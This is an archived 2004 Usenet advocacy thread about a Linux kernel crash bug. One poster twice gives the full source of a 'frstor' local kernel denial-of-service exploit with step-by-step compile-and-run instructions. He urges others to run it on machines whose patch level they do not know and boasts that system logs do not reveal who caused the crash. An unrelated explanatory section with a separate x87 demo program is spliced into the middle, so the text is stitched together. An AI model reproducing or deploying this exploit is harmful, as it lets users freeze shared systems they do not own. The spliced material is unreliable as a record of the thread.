Linux Advocacy archive > June 2004 > Okay, tell me again how bullet proof and robust Linux is....
Okay, tell me again how bullet proof and robust Linux is....
|
|
| T.G.Reaper 2004-06-26, 12:26 pm |
|
[ 16:45:32] Linux Kernel Crash $ ls -ls
total 40
20 -rw------- 1 Reaper users 16900 Jun 16 16:56 2004-06-11_kernel_crash.t2t.tar.bz2
8 -rwxr-xr-x 1 Reaper users 7242 Jun 19 15:31 EvilKernel.Exe
4 -rw-r--r-- 1 Reaper users 1471 Jun 16 17:01 Evil_krnl-1.c
4 -rw-r--r-- 1 Reaper users 1168 Jun 19 15:25 Evil_krnl-1.o
4 -rw-r--r-- 1 Reaper users 529 Jun 16 17:03 Original_Evil_Crash.c
[ 16:45:35] Linux Kernel Crash $
[ 16:45:52] Linux Kernel Crash $ su root
Password:
[ 16:46:14] Linux Kernel Crash $ whoami
root
[ 16:46:23] Linux Kernel Crash $ uname -a
Linux SniFF 2.6.5-Gentoo #2 Tue Apr 20 03:09:39 PDT 2004 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
[ 16:46:35] Linux Kernel Crash $
[ 16:46:38] Linux Kernel Crash $ emerge -u system
Calculating system dependencies ...done!
* GNU info directory index is up-to-date.
[ 16:46:57] Linux Kernel Crash $ exit
exit
[ 16:47:27] Linux Kernel Crash $ whoami
Reaper
[ 16:47:34] Linux Kernel Crash $ ./EvilKernel.Exe
__________________________________
Guess what happens if I actually hit return and execute that little
program. I'll tell you what happens: the entire machine LOCKS UP HARD, no
mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
zilch, nothing at all is usable.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
No entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Hacking Coff 2004-06-26, 12:26 pm |
| T.G.Reaper wrote:
> [snip]
>
> Guess what happens if I actually hit return and execute that little
> program. I'll tell you what happens: the entire machine LOCKS UP HARD, no
> mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
> zilch, nothing at all is usable.
>
>
Reaper's achieved the dream. He's ported one of the most distinguishable
features of Windows to Linux, preserving the Microsoft standard in every
way. Bravo!
Wonder if this'll help the average user feel more comfortable with Linux.
--
AND REDMOND'S STREETS SHALL FLOW RED WITH THE BLOOD OF THE BUTTERFLY!
..sig FILE! .sig FILE!
| |
| Sinister Midget 2004-06-26, 12:27 pm |
| On 2004-06-20, Hacking Coff <jesus@messiah.com.plex> sputtered:
> T.G.Reaper wrote:
>
> Reaper's achieved the dream. He's ported one of the most distinguishable
> features of Windows to Linux, preserving the Microsoft standard in every
> way. Bravo!
>
> Wonder if this'll help the average user feel more comfortable with Linux.
I feel another Teegee Super-Duper Linux Exploit(tm) coming on. I hope
this time he spells out exactly what's needed to make it work so we
don't have to spend days trying to pin down what is needed to make it
operate properly on any particular machine. Like last time.
It had to be gawdawful embarrassing to have to solicit help from the
owners/operators of every participating machine to simply let him 0wN
them.
--
Linux: Because life is too short to spend it rebooting.
| |
| Buford 2004-06-26, 12:27 pm |
| On Sun, 20 Jun 2004 01:53:59 +0000, Sinister Midget wrote:
> On 2004-06-20, Hacking Coff <jesus@messiah.com.plex> sputtered:
>
> I feel another Teegee Super-Duper Linux Exploit(tm) coming on. I hope this
> time he spells out exactly what's needed to make it work so we don't have
> to spend days trying to pin down what is needed to make it operate
> properly on any particular machine. Like last time.
>
> It had to be gawdawful embarrassing to have to solicit help from the
> owners/operators of every participating machine to simply let him 0wN
> them.
Hey, was he the guy who wrote (or possibly found) this super-dooper Linux
exploit, and everybody in COLA was trying to get it to run on their
machines to see what it would do, and it kept failing and crashing, and
T.G. Reaper kept trying to get people to do different things to make it
work so he could 0wN their machines?
I remember that. That was pretty funny.
--
Buford
o. "I'm doing a free operating system (just a hobby, won't be
..o big and professional like gnu)..."
ooo - Linus Torvalds, 1991
| |
| T.G.Reaper 2004-06-26, 12:27 pm |
| On Sun, 20 Jun 2004 01:53:59 +0000, Sinister Midget wrote:
> On 2004-06-20, Hacking Coff <jesus@messiah.com.plex> sputtered:
> I feel another Teegee Super-Duper Linux Exploit(tm) coming on.
As you wish, this time I'm being lazy, here's the source code, you have to
be smart enough to compile and run it yourself.
If that's too hard for some people, maybe I'll post the executable on my
website so that anybody who wants to, can have the opportunity to crash a
random Linux box.
>I hope
> this time he spells out exactly what's needed to make it work
Okay:
Step 1. Copy and paste the below source code: evil.c into the text
editor of your choice and save it to a file named "evil.c."
From a command line in the directory you saved the above file in:
Step 2. $ gcc -o whatevernameyouwant evil.c
Step 3. $ chmod a+x whatevernameyouwant
Step 4. $ ./whatevernameyouwant
Is that too difficult for you?
If it is, like I said, I can post the binary if you wish. Of course,
maybe changing an execute bit is too difficult for a regular Linux
user to accomplish, and there's really no problem.
BTW, just so you will get a realistic sense of how serious the problem is,
try running it on a system that is patched and up to date as of
say, a week ago, you know, like most of the systems around the
world probably are.
/* ---- begin file: evil.c ---------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* SIGALRM handler: save the x87 state into a 108-byte buffer, emit one
 * byte, then reload the state. fsave also re-initialises the FPU, so the
 * frstor is what puts the saved image (the one the header comment is
 * about) back. Only async-signal-safe calls are used here. */
static void TakeDown(int ignore)
{
	char fpubuf[108];
	(void)ignore;
	// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
	__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
	write(2, "*", 1);	/* progress mark on stderr */
	__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
	struct itimerval spec;
	(void)argc; (void)argv;
	signal(SIGALRM, TakeDown);
	/* fire SIGALRM 100 microseconds from now and every 100 microseconds after */
	spec.it_interval.tv_sec=0;
	spec.it_interval.tv_usec=100;
	spec.it_value.tv_sec=0;
	spec.it_value.tv_usec=100;
	setitimer(ITIMER_REAL, &spec, NULL);
	/* busy loop so the process is always running when the timer hits;
	 * the '.' on stdout and '*' on stderr show the handler cycling */
	while(1)
		write(1, ".", 1);
	return 0;
}
// -------- end file evil.c ---------
Out of the millions of Linux systems there are around the world, what
percentage of them do you think are probably vulnerable to being
killed by *any* single user who has local or remote shell access
right now? Pretty scary shit.
On my humble little Gentoo system here, I've updated everything I can
possibly update with the most current patches available. Even so,
the few meager lines of code shown above easily sent my Linux box into la
la land.
--
Linux security....is that some kind of swiss cheese?
Cheers, T.G. Reaper
| |
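The x87 side of what evil.c does, as an added example that is not part of the thread or of the stian/lorenzo proof of concept; the function names (build_image, load_and_touch, run_demo) and the constructed image are assumptions of this example. It takes a genuine 108-byte FSAVE image, rewrites its status word so that an invalid-operation flag is set while the control word masks nothing, reloads it with frstor, and shows that the next waiting instruction (fwait) then raises #MF, which Linux delivers to the process as SIGFPE; reloading the same image but executing fnclex before any waiting instruction makes it harmless, and a clean image never faults. Run from user space the worst this achieves is a signal to the process itself, so the hard lock-up the post reports has to come from how the affected kernels handled such an image when they restored it, which the thread does not document. Two practical notes: gcc already marks its output executable, so the chmod step in the post is redundant, and on a kernel where this is fixed the PoC just prints dots and stars until you interrupt it. The example is x86/x86-64 only; on other targets run_demo() returns -1.

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 108-byte FSAVE/FRSTOR image (32-bit protected-mode layout). Word 0 is the
 * control word, word 1 the status word; only the low 16 bits of each are used. */
typedef struct { unsigned char b[108]; } fsave_image_t;

#if defined(__i386__) || defined(__x86_64__)

static sigjmp_buf fpe_jmp;
static volatile sig_atomic_t fpe_hits;

static void on_fpe(int sig)
{
    (void)sig;
    fpe_hits++;
    siglongjmp(fpe_jmp, 1);      /* never sigreturn into the corrupt state */
}

/* Take a genuine image with FNSAVE (which, like FSAVE, also re-initialises
 * the FPU), then overwrite the control and status words. pending=1 plants
 * an invalid-operation flag (IE, bit 0) plus ES (bit 7) in the status word
 * while the control word masks nothing; pending=0 uses the Linux default
 * control word 0x037f (all six exceptions masked) and a clear status word.
 * Constructed test input for this example. */
static void build_image(fsave_image_t *img, int pending)
{
    uint16_t cw = pending ? 0x0000 : 0x037f;
    uint16_t sw = pending ? 0x0081 : 0x0000;
    __asm__ __volatile__("fnsave %0" : "=m"(*img));
    memcpy(img->b + 0, &cw, sizeof cw);
    memcpy(img->b + 4, &sw, sizeof sw);
}

/* FRSTOR the image, optionally FNCLEX, then execute one waiting instruction.
 * Returns 1 if that sequence raised SIGFPE (#MF), 0 if it did not. */
static int load_and_touch(const fsave_image_t *img, int clear_first)
{
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fpe;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGFPE, &sa, &old);

    fpe_hits = 0;
    if (sigsetjmp(fpe_jmp, 1) == 0) {
        if (clear_first)
            __asm__ __volatile__("frstor %0\n\tfnclex\n\tfwait" : : "m"(*img));
        else
            __asm__ __volatile__("frstor %0\n\tfwait" : : "m"(*img));
    }
    __asm__ __volatile__("fninit");   /* leave a clean FPU behind */
    sigaction(SIGFPE, &old, NULL);
    return fpe_hits != 0;
}

/* Bit 0: corrupt image faults. Bit 1: corrupt image + FNCLEX faults.
 * Bit 2: clean image faults. Expected on x86: 1 (only bit 0 set). */
int run_demo(void)
{
    fsave_image_t img;
    int r = 0;
    build_image(&img, 1);
    r |= load_and_touch(&img, 0) << 0;
    r |= load_and_touch(&img, 1) << 1;
    build_image(&img, 0);
    r |= load_and_touch(&img, 0) << 2;
    return r;
}

#else
int run_demo(void) { return -1; }    /* no x87 unit to demonstrate on */
#endif

int main(void)
{
    int r = run_demo();
    printf("run_demo() = %d (1 means: corrupt image faults, fnclex makes it harmless)\n", r);
    return r == 1 ? 0 : 1;
}
```

Build with plain `gcc -o fpudemo fpudemo.c` on an x86 Linux box; it needs no privileges and does nothing to the machine beyond one SIGFPE delivered to itself. The point of the fnclex case is that pending exception flags are only dangerous to whoever executes the next waiting instruction after loading an untrusted image, which is exactly why an image handed over by a signal handler has to be treated as untrusted input.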
| T.G.Reaper 2004-06-26, 12:27 pm |
| On Sat, 19 Jun 2004 22:10:11 -0500, Buford wrote:
> I remember that. That was pretty funny.
Here sport, compile and run this on a few Linux boxes that you don't know
how up to date the patches are, then come back and tell me how funny you
think those results are.
/* ---- begin file: evil.c ---------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* SIGALRM handler: save the x87 state into a 108-byte buffer, emit one
 * byte, then reload the state. fsave also re-initialises the FPU, so the
 * frstor is what puts the saved image (the one the header comment is
 * about) back. Only async-signal-safe calls are used here. */
static void TakeDown(int ignore)
{
	char fpubuf[108];
	(void)ignore;
	// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
	__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
	write(2, "*", 1);	/* progress mark on stderr */
	__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
	struct itimerval spec;
	(void)argc; (void)argv;
	signal(SIGALRM, TakeDown);
	/* fire SIGALRM 100 microseconds from now and every 100 microseconds after */
	spec.it_interval.tv_sec=0;
	spec.it_interval.tv_usec=100;
	spec.it_value.tv_sec=0;
	spec.it_value.tv_usec=100;
	setitimer(ITIMER_REAL, &spec, NULL);
	/* busy loop so the process is always running when the timer hits;
	 * the '.' on stdout and '*' on stderr show the handler cycling */
	while(1)
		write(1, ".", 1);
	return 0;
}
// -------- end file evil.c ---------
--
Cheers
T.G. Reaper
| |
| T.G.Reaper's IQ is 35 2004-06-26, 12:27 pm |
| T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:10:11 -0500, Buford wrote:
>
>
>
> Here sport, compile and run this
BWAAAHAAAHAAAHAAAHAAHAAAHAA!
T.G.Reaper's volunteer virus:
"Please, please, please compile and run this! Here are the
instructions on how to make your system crash with only
about 5 minutes of work and persistence ..."
| |
| GreyCloud 2004-06-26, 12:27 pm |
|
T.G.Reaper wrote:
> [ 16:45:32] Linux Kernel Crash $ ls -ls
> total 40
> 20 -rw------- 1 Reaper users 16900 Jun 16 16:56 2004-06-11_kernel_crash.t2t.tar.bz2
> 8 -rwxr-xr-x 1 Reaper users 7242 Jun 19 15:31 EvilKernel.Exe
> 4 -rw-r--r-- 1 Reaper users 1471 Jun 16 17:01 Evil_krnl-1.c
> 4 -rw-r--r-- 1 Reaper users 1168 Jun 19 15:25 Evil_krnl-1.o
> 4 -rw-r--r-- 1 Reaper users 529 Jun 16 17:03 Original_Evil_Crash.c
> [ 16:45:35] Linux Kernel Crash $
> [ 16:45:52] Linux Kernel Crash $ su root
> Password:
> [ 16:46:14] Linux Kernel Crash $ whoami
> root
> [ 16:46:23] Linux Kernel Crash $ uname -a
> Linux SniFF 2.6.5-Gentoo #2 Tue Apr 20 03:09:39 PDT 2004 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
> [ 16:46:35] Linux Kernel Crash $
> [ 16:46:38] Linux Kernel Crash $ emerge -u system
> Calculating system dependencies ...done!
>
> * GNU info directory index is up-to-date.
>
> [ 16:46:57] Linux Kernel Crash $ exit
> exit
> [ 16:47:27] Linux Kernel Crash $ whoami
> Reaper
> [ 16:47:34] Linux Kernel Crash $ ./EvilKernel.Exe
>
> __________________________________
>
> Guess what happens if I actually hit return and execute that little
> program. I'll tell you what happens: the entire machine LOCKS UP HARD, no
> mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
> zilch, nothing at all is usable.
>
>
Uh, what program is that?
| |
| GreyCloud 2004-06-26, 12:27 pm |
|
T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:10:11 -0500, Buford wrote:
>
> Here sport, compile and run this on a few Linux boxes that you don't know
> how up to date the patches are, then come back and tell me how funny you
> think those results are.
>
> /* ---- begin file: evil.c ---------
> * frstor Local Kernel exploit
> * Crashes any kernel from 2.4.18
> * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
> * Original proof of concept code
> * by stian_@_nixia.no.
> * Added some stuff by lorenzo_@_gnu.org
> * and fixed the fsave line with (*fpubuf).
> * --------------------
> */
>
> /*
> ---------
> Some debugging information made
> available by stian_@_nixia.no
> ---------
> TakeDown:
> pushl %ebp
> movl %esp, %ebp
> subl $136, %esp
> leal -120(%ebp), %eax
> movl %eax, -124(%ebp)
> #APP
> fsave -124(%ebp)
>
> #NO_APP
> subl $4, %esp
> pushl $1
> pushl $.LC0
> pushl $2
> call write
> addl $16, %esp
> leal -120(%ebp), %eax
> movl %eax, -128(%ebp)
> #APP
> frstor -128(%ebp)
>
> #NO_APP
> leave
> ret
> */
>
> #include <sys/time.h>
> #include <signal.h>
> #include <unistd.h>
>
> static void TakeDown(int ignore)
> {
> char fpubuf[108];
> // __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
> __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
> write(2, "*", 1);
> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
> }
>
> int main(int argc, char *argv[])
> {
> struct itimerval spec;
> signal(SIGALRM, TakeDown);
> spec.it_interval.tv_sec=0;
> spec.it_interval.tv_usec=100;
> spec.it_value.tv_sec=0;
> spec.it_value.tv_usec=100;
> setitimer(ITIMER_REAL, &spec, NULL);
> while(1)
> write(1, ".", 1);
>
> return 0;
> }
>
> // -------- end file evil.c ---------
>
Oh, c'mon. You can do the same thing to XP. It's the incoming stuff
off the internet that won't work on Linux. Easier done than said on XP tho.
| |
| T.G.Reaper's IQ is 35 2004-06-26, 12:27 pm |
| GreyCloud wrote:
> T.G.Reaper wrote:
>
>
> Oh, c'mon. You can do the same thing to XP.
That particular exploit was noted and fixed. It does absolutely
nothing on my box.
In T.G.Reaper's fantasy world, he sees a global brainwash situation
where every Linux user is somehow convinced to download, compile,
and run that code if the user can manage to get root access to the
local PC, thus taking down the Internet.
Is there really any question about his obtuseness?
| |
| William Poaster 2004-06-26, 12:27 pm |
| begin On Sun, 20 Jun 2004 06:13:46 +0000, Sinister Midget posted:
> On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
<snip>
> No, not too difficult. But it still requires me to:
>
> a. compile it.
>
> b. make it executable.
>
> c. run it (probably going to need root access to get the desired result).
>
> d. become 0w43D.
It's amazing to me, that these yo-yos *still* don't realise the hoops you
have to jump through to be 0wn3d. They seem to think that other OS's
behave *just* the same way as Gateware. Sad, really....
> Why can't we just have something posted to usenet, or maybe emailed, or
> stuck on a web page someplace, so we can be 'sploited? You know, like
> Billy Butt-crust has done for the Winders people?
>
> Still, the requirements _might_ be a little less stringent this time.
--
Installing Linux is easy, just watch
http://www.theinquirer.net/?article=6276
| |
| T.G.Reaper 2004-06-26, 1:19 pm |
| On Sat, 19 Jun 2004 22:39:21 -0600, GreyCloud wrote:
>
> Oh, c'mon. You can do the same thing to XP.
Okay, feel free to post the XP equivalent.
> It's the incoming stuff
> off the internet that won't work on Linux.
Well, that kinda depends on what comes in and how doesn't it?
For example, if an average user had shell access to a Linux box, say at
his/her ISP, and logged in from the Net. It would be quite trivial for
that user to manage to execute this little app. That's going to kill the
Linux box dead.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:19 pm |
| T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:39:21 -0600, GreyCloud wrote:
>
>
>
> Okay, feel free to post the XP equivalent.
>
>
> Well, that kinda depends on what comes in and how doesn't it?
>
> For example, if an average user had shell access to a Linux box, say at
> his/her ISP, and logged in from the Net. It would be quite trivial for
> that user to manage to execute this little app. That's going to kill the
> Linux box dead.
>
Sure. You are aware that this is already patched, aren't you?
And, just to stay with your "example", this will also kill the user account.
Because afterwards the admin will install the patch, then take a look which
user did it and kick him off the machine for good.
Now tell us again that any user will do that
Idiot
--
No matter what the anticipated result, there will always be
someone eager to (a) misinterpret it, (b) fake it, or (c) believe
it happened according to his own pet theory.
| |
| T.G.Reaper 2004-06-26, 1:19 pm |
| On Sun, 20 Jun 2004 04:50:11 +0000, T.G.Reaper's wrote:
> GreyCloud wrote:
>
> That particular exploit was noted and fixed. It does absolutely
> nothing on my box.
Well then hell, if your system is already patched then there must not be
any problem. Who the XXXX cares about the thousands, if not millions of
Linux systems worldwide that are vulnerable right now. A system
could still be vulnerable because either a patch isn't available yet (my
case), or no one has actually applied the existing patch to the system.
BTW, I've been told that Linux machines don't need to be rebooted just to
do simple things like apply patches and updates.
Is that true in this case?
> In T.G.Reaper's fantasy world, he sees a global brainwash situation
> where ever Linux user is somehow convinced to download, compile,
> and run that code ...
You are aware that an unpatched Linux box could easily be killed by a
normal user with nothing more than simple remote shell access aren't you?
Now let's see, of all the Linux systems world wide, how many do you think
have some type of remote access enabled?
> Is there really any question about his obtuseness?
At least I don't have to nymshift to avoid people's kill files.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:19 pm |
| On Sun, 20 Jun 2004 06:13:46 +0000, Sinister Midget wrote:
>
> No, not too difficult. But it still requires me to:
>
> a. compile it.
> b. make it executable.
> c. run it (probably going to need root access to get the desired
> result).
> d. become 0w43D.
It's not about being 0w43D, it's about literally killing the system deader
than a doornail, from a regular user account.
> Why can't we just have something posted to usenet, or maybe emailed, or
> stuck on a web page someplace, so we can be 'sploited? You know, like
> Billy Butt-crust has done for the Winders people?
Okay, you want it to be easy, just give me a shell account as a regular
user on any unpatched system you have, is that easy enough?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 11:53:17 +0100, William Poaster wrote:
> It's amazing to me, that these yo-yo's *still* don't realise the hoops you
> have to jump through to be 0wn3d. They seem to think that other OS's
> behave *just* the same way as Gateware. Sad, really....
Okay, same offer, since Linux is so XXXXing bullet proof, suppose you give
me a shell account, as just a regular user on any Linux system you have
which currently has a week or more of uptime?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 15:01:17 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
> Sure. You are aware that this is already patched, are you?
Not on my Gentoo box it's not.
> And, just to stay with your "example", this will also kill the user account.
WTF cares, the system is D.E.A.D at that point, it's doing nothing except
staring at its navel. You can't even reboot it remotely.
Can you say Denial of Service...?
> Because afterwards the admin will install the patch, then take a look which
> user did it and kick him off the machine for good.
BFD, the system is still out of service until a real human being
physically goes to the location of the system, reboots it, and applies
the patch. Assuming a patch exists, one doesn't yet for my Gentoo 2.6
kernel.
> Now tell us again that any user will do that
Yeah right, nobody ever does anything bad to a Linux system because they
might get caught...what a moron.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
< snip >
>
> Yeah right, nobody ever does anything bad to a Linux system because they
> might get caught...what a moron.
>
Not "might". *Will* get caught. Since that user can't remove the evidence
any more (system dead) all remains clear to be seen.
In a corporate network, it will mean getting kicked off the payroll also
With an ISP, it can mean paying damages
Tell us again any user will do it
Idiot (you might be dumb enough to do it)
--
Only two things are infinite,
the Universe and Stupidity.
And I'm not quite sure about the former.
- Albert Einstein
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 15:58:07 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
>
> < snip >
>
>
> Not "might". *Will* get caught. Since that user can't remove the evidence
> any more (system dead) all remains clear to be seen.
> In a corporate network, it will mean getting kicked off the payroll also
> With an ISP, it can mean paying damages
Okay, I've run the exploit code three times on this Gentoo Linux box.
Tell me what logs to look at for the proof that user "Reaper" caused the
system to hang hard?
_____________
Here is the system log across one of the reboots:
Jun 19 19:51:00 SniFF CRON[7541]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:52:00 SniFF CRON[7552]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:53:00 SniFF CRON[7570]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:54:00 SniFF CRON[7587]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:55:00 SniFF CRON[7600]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:56:00 SniFF CRON[7614]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
Jun 19 19:58:46 SniFF syslog-ng[5155]: syslog-ng version 1.6.0rc3 starting
Jun 19 19:58:46 SniFF syslog-ng[5155]: Changing permissions on special file /dev/tty12
Jun 19 19:58:46 SniFF Linux version 2.6.5-Gentoo (root@SniFF) (gcc version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5, propolice-3.3-7)) #2 Tue Apr 20 03:09:39 PDT 2004
Jun 19 19:58:46 SniFF BIOS-provided physical RAM map:
Jun 19 19:58:46 SniFF BIOS-e820: 0000000000000000 - 000000000009f800 (usable)
Jun 19 19:58:46 SniFF BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved)
____________
I don't see anything at all that indicates in anyway that user "Reaper"
caused any type of problem at all. Where is this "proof" that the Admin
would use to kick me off the payroll, or make me pay damages?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Kelsey Bjarnason 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 06:05:21 -0700, T.G.Reaper wrote:
> On Sun, 20 Jun 2004 11:53:17 +0100, William Poaster wrote:
>
>
>
> Okay, same offer, since Linux is so XXXXing bullet proof, suppose you give
> me a shell account, as just a regular user on any Linux system you have
> which currently has a week or more of uptime?
Nah, let's compare equivalents. Since those Windows systems which are
getting exploited *aren't*, on the whole, giving out remote shell
accounts, you get the same accommodations. No accounts, but do feel free
to exploit the box anyhow.
You see, if you can't do that, then all that's required to render a Linux
box absolutely secure against remote exploits is to disable remote logins,
which would be a very bad blow for Windows in any comparison of security.
While we're at it, let's also try it the other way: you open up your
Windows box to remote logins, give us the account information and we'll
see which box survives the longer: the Linux box with remote logins, or
the Windows box with remote logins. Oh, but wait... your little exploit
just locks up the box, it doesn't, say, give the user admin privileges
which they can use to access private information, etc, right? So there's
no "0wn3d" involved here at all, really - just frozen.
| |
| Sinister Midget 2004-06-26, 1:20 pm |
| On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> On Sun, 20 Jun 2004 06:13:46 +0000, Sinister Midget wrote:
>
>
>
> It's not about being 0w43D, it's about literally killing the system deader
> than a doornail, from a regular user account.
>
>
> Okay, you want it to be easy, just give me a shell account as a regular
> user on any unpatched system you have, is that easy enough?
You mean so I can _delegate_ steps a-d? It _still_ requires me to
cooperate or you don't get to do it.
It's not just about being "easy", it's about being "just as easy",
which is the claim made over and over and over wrt how linux is going
to be just as in-trouble as Windoze. As enough people use it, that is.
We linux users should be quaking, we're told, because very, very soon
we're going to be noticed by all of those bad guys who are now
targeting the poor innocent, unbuggy, stable, better-because-there's-
a-company-with-a-name-attached Windoze, and start going after all of
the linux machines on earth when the numbers get high enough to warrant
the bother. If it's going to happen, you and others are going to have to
pull it off without asking us to do the work for you, or allowing you
into our machines to do it on your own.
----------------------------------------------------------------
Dear Mr/Mrs/Ms computer user,
Attached is a patch for a very dangerous problem you have on your
linux machine. I have been authorized by Mr. Linux Turvulds to send
this patch along to make sure you are safe. We don't want to be like
the WinDoze people, infecting a lot of other linux machines all over
the internet, now do we?
I need your cooperation with fixing this horrendous bug, though.
Would you please compile the patch, make it executable, then run it?
This is very important! Mr. Linnus Torvulds said you should do this
without delay!
I understand some of the above might be a bit daunting for some of
you. So I have been authorized by Linis to be even more helpful. If
you don't understand fully the steps needed to get this patch
installed, we can do this another way. Please open a shell account
for me to access your machine so I can install it myself. Make the
username "abuser" without quotes. I know that looks like a trick by
using that name, but we need to keep the bad guys off-guard, and they
would never suspect a friendly linux user to use a name like that.
Once you create the account, make the password "0wn3d" without
quotes. Remember, to keep passwords secure it's best to mix letters
and numbers. If you'd like to take extra security precautions, you can
create a different one, ROT-13 the password and email it back to me.
Evil people don't use ROT-13, so they will never guess that this is
what you've done and they won't know how to get into your machine.
Once this patch has been applied, you will know. More importantly,
though, you will have made yourself safer, and enhanced the security
of the free world dramatically.
I thank you, Mr. Linuss Trovolds thanks you. All of your fellow linux
users thank you.
A linux-using friend
---------------------------------------------------------------
--
